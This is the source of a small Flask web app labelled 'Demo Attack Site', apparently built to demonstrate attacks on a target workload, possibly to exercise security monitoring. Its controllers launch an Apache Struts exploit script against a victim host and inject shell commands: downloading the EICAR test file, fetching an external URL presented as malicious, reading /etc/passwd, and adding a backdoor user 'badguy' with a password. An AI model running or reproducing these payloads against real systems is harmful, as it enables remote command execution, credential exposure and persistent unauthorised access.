webapp/__init__.py
from flask import Flask, render_template

'''
def page_not_found(error):
    return render_template('404.html'), 404'''


def create_app(object_name):

    app = Flask(__name__)
    app.config.from_object(object_name)
    from .main import create_module as main_create_module
    main_create_module(app)

    return app

webapp/main/__init__.py
def create_module(app, **kwargs):
    from .controllers import main_blueprint
    app.register_blueprint(main_blueprint)

webapp/main/controllers.py
from flask import render_template, Blueprint, flash, redirect, url_for, current_app
import subprocess, os

###################################################################################
# NOTES:
#
# If using Dockerfile, the python path will need to be changed to /usr/local/bin/python
#
# Need to dynamically read in the value for "victim_host"
#
###################################################################################
victim_host = ''
with open ("VICTIM_HOST.txt", "r") as configfile:
    victim_host = configfile.read().replace('\n', '')

#victim_host = os.environ['VICTIM_HOST'] # This environment variable is set via the terraform aws_instance.bastion_host provisioner script.
struts_port = ''
with open ("STRUTS_PORT.txt", "r") as configfile:
    struts_port = configfile.read().replace('\n', '')

#struts_port = os.environ['STRUTS_PORT'] # This environment variable is set via the terraform asws_instance.bstion_host provisioner script.

main_blueprint = Blueprint(
    'main',
    __name__,
    template_folder='../templates/main'
)

def format_output(output):
    print(type(output))
    if (isinstance(output, str)):
        return output
    else:
        return str(output.decode("utf-8"))

@main_blueprint.route('/')
def home():
    return render_template('index.html', victim_host=victim_host)


@main_blueprint.route('/ping') 
def ping():
    #output = "fake output"
    try:
        output = subprocess.check_output(["ping", "-c", "1", "8.8.8.8"])
        flash("The command ran successfully", category="success")
    except subprocess.CalledProcessError as e:
        flash("An error occurred", category="danger")
        output = "An error occurred:\n {e}".format(e=e)
    return render_template('struts.html', output=format_output(output))


@main_blueprint.route('/ping_target') 
def ping_target():
    #output = "fake output"
    try:
        output = subprocess.check_output(["ping", "-c", "1", victim_host])
        flash("The command ran successfully", category="success")
    except subprocess.CalledProcessError as e:
        flash("An error occurred", category="danger")
        output = "An error occurred:\n {e}".format(e=e)
    return render_template('struts.html', output=format_output(output))


@main_blueprint.route('/cmd_exe') 
def cmd_exe():
    #output = "fake output"
    try:
        target_url = "{victim_host}:{struts_port}/cmd.exe".format(victim_host=victim_host, struts_port=struts_port)
        output = subprocess.check_output(["curl", target_url])
        flash("The command ran successfully", category="success")
    except subprocess.CalledProcessError as e:
        flash("An error occurred", category="danger")
        output = "An error occurred:\n {e}".format(e=e)
    return render_template('struts.html', output=format_output(output))


@main_blueprint.route('/struts_eicar') 
def struts_eicar():
    #output = "fake output"
    try:
        output = subprocess.check_output(["/usr/bin/python", "exploit.py", "http://{victim_host}:{struts_port}/hello".format(victim_host=victim_host, struts_port=struts_port), "wget http://www.eicar.org/download/eicar.com -O /tmp/eicar.com"])
        flash("The command ran successfully", category="success")
    except subprocess.CalledProcessError as e:
        flash("An error occurred", category="danger")
        output = "An error occurred:\n {e}".format(e=e)
    return render_template('struts.html', output=format_output(output))


@main_blueprint.route('/struts_eicar_https') 
def struts_eicar_https():
    #output = "fake output"
    try:
        output = subprocess.check_output(["/usr/bin/python", "exploit.py", "http://{victim_host}:{struts_port}/hello".format(victim_host=victim_host, struts_port=struts_port), "apk add --update openssl; wget https://secure.eicar.org/eicar.com -O /tmp/eicar.com"])
        flash("The command ran successfully", category="success")
    except subprocess.CalledProcessError as e:
        flash("An error occurred", category="danger")
        output = "An error occurred:\n {e}".format(e=e)
    return render_template('struts.html', output=format_output(output))


@main_blueprint.route('/struts_mal_url') 
def struts_mal_url():
    #output = "fake output"
    try:
        output = subprocess.check_output(["/usr/bin/python", "exploit.py", "http://{victim_host}:{struts_port}/hello".format(victim_host=victim_host, struts_port=struts_port), "wget http://wrs21.winshipway.com -O index.html"])
        flash("The command ran successfully", category="success")
    except subprocess.CalledProcessError as e:
        flash("An error occurred", category="danger")
        output = "An error occurred:\n {e}".format(e=e)
    return render_template('struts.html', output=format_output(output))



@main_blueprint.route('/struts_list_users') 
def struts_list_users():
    #output = "fake output"
    try:
        target = "http://{victim_host}:{struts_port}/hello".format(victim_host=victim_host, struts_port=struts_port)
        output = subprocess.check_output(["/usr/bin/python", "exploit.py", target, "cat /etc/passwd"])
        flash("The command ran successfully", category="success")
    except subprocess.CalledProcessError as e:
        flash("An error occurred", category="danger")
        output = "An error occurred:\n {e}".format(e=e)
    return render_template('struts.html', output=format_output(output))



@main_blueprint.route('/struts_create_user') 
def struts_create_user():
    #output = "fake output"
    try:
        output = subprocess.check_output(["/usr/bin/python", "exploit.py", "http://{victim_host}:{struts_port}/hello".format(victim_host=victim_host, struts_port=struts_port), 'adduser -D badguy; echo "badguy:newpass" | chpasswd'])
        flash("The command ran successfully", category="success")
    except subprocess.CalledProcessError as e:
        flash("An error occurred", category="danger")
        output = "An error occurred:\n {e}".format(e=e)
    return render_template('struts.html', output=format_output(output))





    

webapp/templates/base.html
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <title>{% block title %}Flask{% endblock %}</title>
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css" integrity="sha384-9gVQ4dYFwwWSjIDZnLEWnxCjeSWFphJiwGPXr1jddIhOegiu1FwO5qRGvFXOdJZ4" crossorigin="anonymous">
    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.10/css/all.css" integrity="sha384-+d0P83n9kaQMCwj8F4RJB66tzIwOKmrdb46+porD/OvrJ+37WqIM7UoBtwHO6Nlg" crossorigin="anonymous">
</head>
<body>
{% include 'navbar.html' %}
<div class="container">
    {% include 'messages.html' %}
    {% block body %}
    {% endblock %}
    {% include 'footer.html' %}
</div>
</body>
<script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js" integrity="sha384-cs/chFZiN24E4KMATLdqdvsezGxaGsi4hLGOzlXwp5UZB1LY//20VyM2taTB4QvJ" crossorigin="anonymous"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js" integrity="sha384-uefMccjFJAIv6A+rW+L4AHf99KvxDjWSu1z9VI8SKNVmz4sk7buKt/6v9KI65qnm" crossorigin="anonymous"></script>    </body>
</html>

webapp/templates/footer.html
<hr/>
<div class="row">
    Demo Attack Site - 2019
</div>

webapp/templates/head.html
<div class="container bg-info rounded">
    <center>
    <i class="fas fa-comments fa-5x"></i>
    <p>Welcome!</p>
    </center>
</div>

webapp/templates/main/index.html
{% extends "base.html" %}
{% block body %}

  <div class="jumbotron">
    <h1>Demo Attack Site</h1>
    <p>Click a button to run an exploit against the target workload ({{victim_host}})</p>
  </div>
  <div>
    <div class="row">
      <table class="table table-striped">
        <thead class="thead-dark">
          <tr>
            <th>Attack Description</th><th>Execute Attack</th>
            </tr>
        </thead>
        <tbody>
            <tr>
              <td>Ping Google (8.8.8.8)</td><td> <a href="/ping" class="btn btn-primary btn-md">Execute</a> </td>
            </tr>
            <tr>
		          <td>Ping target workload ({{victim_host}})</td><td> <a href="/ping_target" class="btn btn-primary btn-md">Execute</a> </td>
            </tr>
            <tr>
		          <td>Access /cmd.exe on ({{victim_host}})</td><td> <a href="/cmd_exe" class="btn btn-primary btn-md">Execute</a> </td>
            </tr>
            <tr>
              <td>Exploit Apache Struts Vuln and list users</td><td> <a href="/struts_list_users" class="btn btn-primary btn-md">Execute</a> </td>
            </tr>
            <tr>
              <td>Exploit Apache Struts Vuln and connect to malicious URL</td><td> <a href="/struts_mal_url" class="btn btn-primary btn-md">Execute</a> </td>
            </tr>
            <tr>
              <td>Exploit Apache Struts Vuln and create a user</td><td> <a href="/struts_create_user" class="btn btn-primary btn-md">Execute</a> </td>
            </tr>
            <tr>
              <td>Exploit Apache Struts Vuln and download eicar</td><td> <a href="/struts_eicar" class="btn btn-primary btn-md">Execute</a> </td>
            </tr>
            <tr>
              <td>Exploit Apache Struts Vuln and download eicar (https)</td><td> <a href="/struts_eicar_https" class="btn btn-primary btn-md">Execute</a> </td>
            </tr>
        </tbody>
      </table>
    </div>
  </div>

{% endblock %}

webapp/templates/main/struts.html
{% extends "base.html" %}
{% block body %}

<div class="user-profile">
  <!--<div class="jumbotron">
    <h1>Struts</h1>
  </div>-->
  <h2>Attack Output:</h2>
  <p>{{output}}</p>
  <p><a href="/" class="btn btn-primary btn-md">Back</a></p>
</div>

{% endblock %}

webapp/templates/messages.html
{% with messages = get_flashed_messages(with_categories=true) %}
{% if messages %}
{% for category, message in messages %}
<div class="alert alert-{{ category }} alert-dismissible" role="alert">
    <button type="button" class="close" data-dismiss="alert" aria-label="Close"><span aria-hidden="true">&times;</span></button>
    {{ message }}
</div>
{% endfor %}
{% endif %}
{% endwith %}

webapp/templates/navbar.html
    <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
        <a class="navbar-brand" href="{{ url_for('main.home') }}">Home</a>
        <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
        </button>
          
        <div class="collapse navbar-collapse" id="navbarSupportedContent">
            <ul class="navbar-nav mr-auto">
                <li class="nav-item dropdown">
                    <a class="nav-link dropdown-toggle" href="#" id="navbarDropdown" role="button" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                    Dropdown
                    </a>
                    <div class="dropdown-menu" aria-labelledby="navbarDropdown">
                        <a class="dropdown-item" href="#">Action</a>
                        <a class="dropdown-item" href="#">Another action</a>
                        <div class="dropdown-divider"></div>
                        <a class="dropdown-item" href="#">Something else here</a>
                    </div>
                </li>
            </ul>
            <ul class="navbar-nav ml-auto">
             
            </ul>

        </div>
    </nav>